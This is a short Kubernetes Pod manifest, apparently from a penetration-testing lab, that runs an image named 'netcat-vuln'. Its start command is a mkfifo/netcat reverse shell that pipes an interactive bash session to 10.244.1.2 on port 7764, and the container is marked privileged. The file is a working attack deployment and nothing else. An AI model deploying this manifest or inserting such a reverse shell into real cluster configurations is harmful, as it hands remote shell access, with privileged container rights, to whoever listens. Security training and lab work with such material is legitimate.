apiVersion: v1
kind: Pod
metadata:
  name: netcat-pod
  labels:
    app: pentest
spec:
  containers:
  - name: netcat-pod
    image: justmorpheu5/netcat-vuln
    command: ["sh", "-c", "mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.244.1.2 7764 >/tmp/f"]
    securityContext:
      runAsUser: 1000
      runAsNonRoot: true
      privileged: true
